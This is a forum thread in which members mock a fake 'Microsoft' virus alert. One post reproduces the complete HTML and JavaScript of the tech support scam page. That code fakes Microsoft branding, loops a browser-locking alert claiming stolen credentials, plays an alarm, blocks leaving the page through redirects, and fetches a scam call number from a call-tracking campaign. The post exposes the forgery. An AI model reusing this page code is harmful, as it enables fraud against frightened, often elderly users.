Important Alert from "Microsoft"

User avatar
S']['U
Posts: 1071
Joined: Fri Dec 09, 2011 8:03 am

Important Alert from "Microsoft"

Post by S']['U »

(The red text is mine)
Alert from Microsoft.PNG
The Boloblur
Posts: 118
Joined: Sun Apr 03, 2016 6:42 am
Location: Michigan

Re: Important Alert from "Microsoft"

Post by The Boloblur »

ALT F4
perrinoia
Site Admin
Posts: 3732
Joined: Sun Jul 01, 2012 7:18 pm

Re: Important Alert from "Microsoft"

Post by perrinoia »

Image
User avatar
LM|RCMP*
Posts: 127
Joined: Thu Apr 24, 2014 9:07 pm
Location: London, Ontario, Canada

Re: Important Alert from "Microsoft"

Post by LM|RCMP* »

LM|| RCMP*
Head of Security
Image
User avatar
S']['U
Posts: 1071
Joined: Fri Dec 09, 2011 8:03 am

Re: Important Alert from "Microsoft"

Post by S']['U »

I did a Google search for "error 268D3" and found lots of people asking about this on the Microsoft answer page.

Microsoft's response:

Thank you for contacting Microsoft Community.
In order to help you better, could you please confirm a couple of things:
When exactly do you get this message?
What is the exact error message are you getting?
Which security software \ app are you suing?
We request you to provide us the screen shot of the issue, so that we can check in detail and help you further on this issue.


Someone actually went to the trouble of providing a screenshot, but still got no response.

I can't believe Microsoft is that ignorant about a common and obvious scam, and they don't seem a bit concerned that
scammers are impersonating them.

I think that they don't want to do anything about it, because it's more likely that dumb people will either format their HD to get rid of the problem or buy a new computer.
Either way, it means more money in their pocket if people end up installing a new OS.
User avatar
Erowid
Site Admin
Posts: 684
Joined: Fri Dec 09, 2011 8:02 am
Location: Wisconsin
Contact:

Re: Important Alert from "Microsoft"

Post by Erowid »

I don't know man, my grandma thinks it looks pretty official
__________________________________
____________________________________________________
Image
Image
Image
Image


Image
perrinoia
Site Admin
Posts: 3732
Joined: Sun Jul 01, 2012 7:18 pm

Re: Important Alert from "Microsoft"

Post by perrinoia »

That's probably why Microsoft hasn't responded yet... They're investigating internally to find out which department created the warning message.
Image
User avatar
LM|RCMP*
Posts: 127
Joined: Thu Apr 24, 2014 9:07 pm
Location: London, Ontario, Canada

Re: Important Alert from "Microsoft"

Post by LM|RCMP* »

perrinoia wrote:That's probably why Microsoft hasn't responded yet... They're investigating internally to find out which department created the warning message.
That would be "NONE". I've looked at the index.php source, and here is the full source. very obvious forgery

Code: Select all

<!DOCTYPE html>

<html lang="en"><head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

    <meta charset="utf-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->

    <meta name="description" content="">

    <meta name="author" content="">

    <link rel="icon" href="">

    <script src="https://d1a32x6bfz4b86.cloudfront.net/jsapi/v1/retreaver.min.js" type="text/javascript"></script>

    <script src="https://code.jquery.com/jquery-1.11.2.min.js" type="text/javascript"></script>

    <script>

        // this script is so you can get fields our of the URL to put in variables (UPDATED VERSION THAT ACTUALLY CHECKS FULL PARAMETER NAME BEGIN OF ? OR &)

        function getURLParameter(name) {

            return decodeURIComponent((new RegExp('[?|&]' + name + '=' + '([^&;]+?)(&|#|;|$)').exec(location.search)||[,""])[1].replace(/\+/g, '%20'))||null;

        }

    </script>



    <title>Microsoft Official Support</title>

    <link href="files/bootstrap.css" rel="stylesheet">

    <link href="files/style.css" rel="stylesheet">



    <script src="files/ie-emulation-modes-warning.js"></script>





    <script src="files/html.js" async="" type="text/javascript"></script>

    <script>

        var ran = false;  //Flag we have not run the script to pull the number yet

        var loco = ""; //The location of the page that we will load on a second pop

        var msg = "";



        //figure out what to use for default number and number loaded on subsequent load (Any number from the campaign that is static can be used (or even direct line to client center)

        var default_number = "(855) 294-2881"; //will be used when number pool is full as the default number (Use Whatever Country Format the number is for)

        var default_plain_number = "8552942881"; //will be used as the unformatted default number for hyperlinking the number/image/text

        var number = "(855) 294-2881"; //use this variable for the formatted number to display

        var plain_number = "8552942881"; //use this variable for the hyperlink if used <a href="tel:+1"+ plain_number +"">



        //allow for the traffic source to send in their own default number if a number can't be obtained from the pool

        var dn = getURLParameter('dn');

        if (dn != '') { //if we going to use a default number different for each affiliate

            default_plain_number = dn;

            plain_number = dn;

            var dfn = getURLParameter('dfn'); //get the default formatted number sent in

            if (dfn == "") dfn = dn; //if no formatted number just use it unformatted

            default_number = dfn; //so we have it in a good format as well

            number = dfn;

        }



        //if we already loaded the page before OR the source is just trying to use a static number at your site

        var ftfn = getURLParameter('ftfn'); //if you see a formatted number to use in the URL, use that, don't call for a new number

        if (getURLParameter('ftfn')) { //if we are reloading the page, don't call the system to get a new number

            number = ftfn; //we will use this as the formatted number and not call system for a new number

            var ptfn = getURLParameter('ptfn'); //get the unformatted number to use for hyperlinking

            if (getURLParameter('ftfn'))

                ptfn = ftfn; //if no unformatted number just use it formatted for hyperlinking

            plain_number = ptfn; //so we have it in a good hyperlink format as well

        }

    </script>



    <script>

        function getSystemInfo() {

            
        }

    </script>





    <script type="text/javascript" defer>

        function loadNumber() {

            getSystemInfo();



            if (!ran) { //if we haven't ran this function before, get a new number

                if (!getURLParameter('ftfn')) { //if we don't have the phone# in the URL, get it the first time

// Initialize the campaign using the campaign key from your campaign page.  On the line below, nothing should ever need to change but the key

                    var campaign = new Callpixels.Campaign({campaign_key: '2b3fc81a415d65c3fd7a5fc473956176'});



// Set the tags we want to use in order to find a matching number.  Format:   var tags = {calling_about: 'sales', currently_insured: 'no'}; format is basically var tags = {tag1: 'value1', tag2: 'value2', etc};

                    var tags = {

                        lander: 'redsod',

                        os: 'Windows'

                    }; //leave like this if you are not trying to send any tags, or replace with above format.



// request a number that matches the tags. Format: campaign.request_number(tags, function (matching_number){}, function(error){});

                    campaign.request_number(tags,

                        function (matching_number) {

                            number = matching_number.get('formatted_number');

                            plain_number = matching_number.get('plain_number');



// Save the number so we can reference it later.

                            window.callpixels_number = matching_number;

                        }, //end the function (matching_number)

// 3rd Parameter of the campaign.request_number function is the error handling

                        function (error) {

                            number = default_number; //Since this isn't being returned from function, this is actually a formatted string to use for the default number

                            plain_number = default_plain_number; //And this is the unformatted number to be used for hypering linking <a href="tel:+1[plain_number]....

                        } //end the error function

                    ); //end the campaign.request_number function

                } //end if reloading



                ran = true; //so we don't get the number more than once



                function doRedirect(url) {

                    setTimeout(function() {

                        location.href = url;

                    }, 50);

                }









                function randomString(length) {

                    var text = "";

                    var possible = "abcdefghijklmnopqrstuvwxyz0123456789";

                    for(var i = 0; i < length; i++) {

                        text += possible.charAt(Math.floor(Math.random() * possible.length));

                    }

                    return text;

                }

                var loco_params = "?ptfn=" + plain_number + "&ftfn=" + number + ""; //on a reload, the script looks for the ftfn variable and will not call the script to get a new number again.

                var c=randomString(10);

                var e=c+"."+window.location.hostname+window.location.pathname;

                loco="http://"+e+loco_params;





                FormattedNumber1.innerHTML = number;

                FormattedNumber2.innerHTML = number;

                audioarea.innerHTML = '<audio autoplay="autoplay" loop=""><source src="files/alert2.mp3" type="audio/mpeg"></audio>';



                function leavebehind() {

                    var leavebehind;

                    leavebehind = loco;

                    setTimeout(

                        function () {

                            window.location.href = leavebehind;

                        },

                        500);

                    return true;

                }









                function myFunction() {

                    var step = 0,

                        previousStep = 0,

                        redirected = false;



                    setInterval(function () {

                        // Firefox NS_ERROR_NOT_AVAILABLE fix

                        if (step !== previousStep) {

                            if (!redirected) {

                                redirected = true;

                                console.log('redirect for Firefox');

                                doRedirect(loco);

                            }

                        }

                        step++;



                        var start = new Date().getTime();

                        alert("\n\             ** YOUR COMPUTER HAS BEEN BLOCKED **\n\nError # 268D3\n\nPlease call us immediately at: " + number + " \n\nPlease do not ignore this critical alert.  If you close this page, your computer access will be disabled to prevent further damage to our network.\n\nYour computer has alerted us that it has been infected with a virus and spyware.  The following information is being stolen...\n\n> Facebook Login\n> Credit Card Details\n> Email Account Login\n> Photos stored on this computer\n\nYou must contact us immediately so that our engineers can walk you through the removal process over the phone.  Please call us within the next 5 minutes to prevent your computer from being disabled.\n\nToll Free: " + number + " \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");



                        // if delta less than 50ms then it's browser's action

                        // thus we need redirect

                        var dt = new Date().getTime() - start;

                        console.log(dt);

                        if (dt < 50) {

                            if (!redirected) {

                                redirected = true;

                                console.log('redirect by delta time');

                                doRedirect(loco);

                            }

                        }



                        previousStep++;

                    }, 100);

                }



                function confirmExit() {

                    window.location.href = loco;

                }

                window.onbeforeunload = confirmExit;

                onmouseover="myFunction();";

                onclick="myFunction();";

                onkeydown="myFunction();";

                myFunction();

            } //end the if Not Ran check

        } //end the loadNumber function

    </script>



</head>

<body onload="loadNumber();">

<div id="coFrameDiv" style="height:0px;display:none;">

    <iframe id="coToolbarFrame" src="about:blank" style="height:0px;width:100%;display:none;"></iframe>

</div>

<span id="audioarea"></span>




<!-- Fixed navbar -->

<nav class="navbar navbar-default navbar-static-top">

    <div class="container">

        <div class="navbar-header">

            <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">

                <span class="sr-only">Toggle navigation</span>

                <span class="icon-bar"></span>

                <span class="icon-bar"></span>

                <span class="icon-bar"></span>

            </button>

            <a class="navbar-brand" href="#">

                <img src="files/microsoft.png" alt="Microsoft">

            </a>

        </div>

        <div id="navbar" class="navbar-collapse collapse">

            <ul class="nav navbar-nav">

                <li class="dropdown">

                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Store<span class="caret"></span></a>

                    <ul class="dropdown-menu">

                        <li><a href="#">Store Home </a></li>

                        <li><a href="#">Devices</a></li>

                        <li><a href="#">Software</a></li>

                        <li><a href="#">Apps</a></li>

                        <li><a href="#">Games</a></li>

                    </ul>

                </li>

                <li class="dropdown">

                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Products<span class="caret"></span></a>

                    <ul class="dropdown-menu">

                        <li><a href="#">Software & services</a></li>

                        <li><a href="#">Devices & Xbox</a></li>

                        <li><a href="#">For business</a></li>

                    </ul>

                </li>

                <li><a href="#">Support</a></li>

            </ul>

            <ul class="nav navbar-nav navbar-right">

                <li><a href="#"><span class="glyphicon glyphicon-shopping-cart"></span>0</a></li>

                <li><a href="#">Sign in</a></li>

            </ul>

        </div><!--/.nav-collapse -->

    </div>

</nav>



<div class="container">

    <div class="jumbotron">

        <div class="row">

            <div class="col-xs-6 text-left">

                <h2 style="padding-left: 30px;">Call for support:</h2>

                <h2>+1 <span id="FormattedNumber1"></span></h2>

            </div>

            <div class="col-xs-6 text-right">

                <h2 style="padding-left: 30px;">Call for support:</h2>

                <h2>+1 <span id="FormattedNumber2"></span></h2>

            </div>

        </div>

    </div>



    <div class="row" style="padding: 40px; text-align: center;">

        <div class="col-xs-6 col-sm-3">

            <a>

                <span class="glyphicon glyphicon-user"></span>

                <span>Manage my account</span>

            </a>

        </div>

        <div class="col-xs-6 col-sm-3">

            <a>

                <span class="glyphicon glyphicon-user"></span>

                <span>Ask the community</span>

            </a>

        </div>

        <div class="col-xs-6 col-sm-3">

            <a>

                <span class="glyphicon glyphicon-user"></span>

                <span>Contact Answer Desk</span>

            </a>

        </div>

        <div class="col-xs-6 col-sm-3">

            <a>

                <span class="glyphicon glyphicon-download-alt"></span>

                <span>Find downloads</span>

            </a>

        </div>

    </div>



    <div class="row" style="text-align: center;">

        <h3>I need help with...</h3>

        <div class="bs-glyphicons" style="margin-top:30px;">

            <div class="row">

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/windowspc.svg')"></span>

                    <span class="glyphicon-class product-name">WIndows</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/windowsphone.svg')"></span>

                    <span class="glyphicon-class product-name">Windows Phone 8</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/mobile.svg')"></span>

                    <span class="glyphicon-class product-name">Lumia devices</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/xbox.svg')"></span>

                    <span class="glyphicon-class product-name">Xbox</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/office.svg')"></span>

                    <span class="glyphicon-class product-name">Office</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/onedrive.svg')"></span>

                    <span class="glyphicon-class product-name">OneDrive</span>

                </div>

            </div>

            <div class="row">

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/surface.svg')"></span>

                    <span class="glyphicon-class product-name">Surface</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/edge.svg')"></span>

                    <span class="glyphicon-class product-name">Microsoft Edge</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/ie.svg')"></span>

                    <span class="glyphicon-class product-name" >Internet Explorer</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/skype.svg')"></span>

                    <span class="glyphicon-class product-name">Skype</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/outlook.svg')"></span>

                    <span class="glyphicon-class product-name">Outlook.com</span>

                </div>

                <div class="col-lg-2 col-md-4 col-xs-6">

							<span class="glyphicon product-img" aria-hidden="true"

                                  style="background-image: url('files/images/msn.svg')"></span>

                    <span class="glyphicon-class product-name">MSN</span>

                </div>

            </div>

        </div>

    </div>



    <div class="row" style="text-align: center; padding-bottom: 50px;">

        <a><h4 style="margin-top: 40px; margin-bottom: 80px;">View all Microsoft products</h4></a>



        <div class="row">

            <div class="col-md-4" style="text-align:left;">

                <h4>Business, IT & developer</h4>

                <ul style="padding:0px;">

                    <li style="list-style: none; padding:10px 0px;"><a>Support for small business</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Enterprise and partners</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>IT Professionals</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Developers</a></li>

                </ul>

            </div>

            <div class="col-md-4" style="text-align:left;">

                <h4>Set up & install</h4>

                <ul style="padding:0px;">

                    <li style="list-style: none; padding:10px 0px;"><a>How to upgrade to Windows 10</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Install Office 365 Home, Personal, or University</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Activate Office 365 Home, Personal, University, Office 2013, or Office 2016</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>why is office taking so long to install?</a></li>

                </ul>

            </div>

            <div class="col-md-4" style="text-align:left;">

                <h4>Popular topics</h4>



                <ul style="padding:0px;">

                    <li style="list-style: none; padding:10px 0px;"><a>Activation in Windows 10</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Need Help with Office 2016?</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Windows 10 FAQ</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Windows 10 help & how-to</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help & how-to</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10, Windows 8, or WIndows 7?</a></li>

                </ul>

            </div>

        </div>



    </div>

</div>



<footer class="footer">

    <div class="container">

        <div class="row">

            <div class="col-md-4" style="text-align:left;">

                <h4>Support</h4>

                <ul style="padding:0px;">

                    <li style="list-style: none; padding:10px 0px;"><a>Account support</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Supported products list</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Product support lifecycle</a></li>

                </ul>

            </div>

            <div class="col-md-4" style="text-align:left;">

                <h4>Security</h4>

                <ul style="padding:0px;">

                    <li style="list-style: none; padding:10px 0px;"><a>Safety & Security Center</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Download Security Essentials</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Malicious Software Removal Tool</a></li>

                </ul>

            </div>

            <div class="col-md-4" style="text-align:left;">

                <h4>Popular topics</h4>



                <ul style="padding:0px;">

                    <li style="list-style: none; padding:10px 0px;"><a>Report a support scam</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Disability Answer Desk</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Locate Microsoft addresses worldwide</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Windows 10 help & how-to</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help & how-to</a></li>

                    <li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10, Windows 8, or WIndows 7?</a></li>

                </ul>



            </div>

        </div>

        <div class="row" style="font-size: 1.2rem; padding:30px 0px;">

            <div style="float:left;"><span class="glyphicon glyphicon-cd"></span><span>English(United States)</span></div>

            <div style="float:right;">

                <span style="padding:0px 15px;">Terms of use</span>

                <span style="padding:0px 15px;">English(United States)</span>

                <span style="padding:0px 15px;">Trademarks</span>

                <span style="padding:0px 15px;">@2016 Microsoft</span>

            </div>

        </div>

    </div>

</footer>



<script src="files/jquery.js"></script>

<script>window.jQuery || document.write('<script src="assets/js/vendor/jquery.min.js"><\/script>')</script>

<script src="files/bootstrap.js"></script>

<!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->

<script type="text/javascript">



    (function () {

        'use strict';



        if (navigator.userAgent.match(/IEMobile\/10\.0/)) {

            var msViewportStyle = document.createElement('style')

            msViewportStyle.appendChild(

                document.createTextNode(

                    '@-ms-viewport{width:auto!important}'

                )

            )

            document.querySelector('head').appendChild(msViewportStyle)

        }



    })();



</script>





</body></html>
LM|| RCMP*
Head of Security
Image
perrinoia
Site Admin
Posts: 3732
Joined: Sun Jul 01, 2012 7:18 pm

Re: Important Alert from "Microsoft"

Post by perrinoia »

No shit... I was making a joke about incompetent tech support.
Image
User avatar
LM|RCMP*
Posts: 127
Joined: Thu Apr 24, 2014 9:07 pm
Location: London, Ontario, Canada

Re: Important Alert from "Microsoft"

Post by LM|RCMP* »

lol. and guess what? that is the only viewable page on that domain. if there is anything else, its back end server stuff for logging purposes. One index.php page. thats it
LM|| RCMP*
Head of Security
Image
Post Reply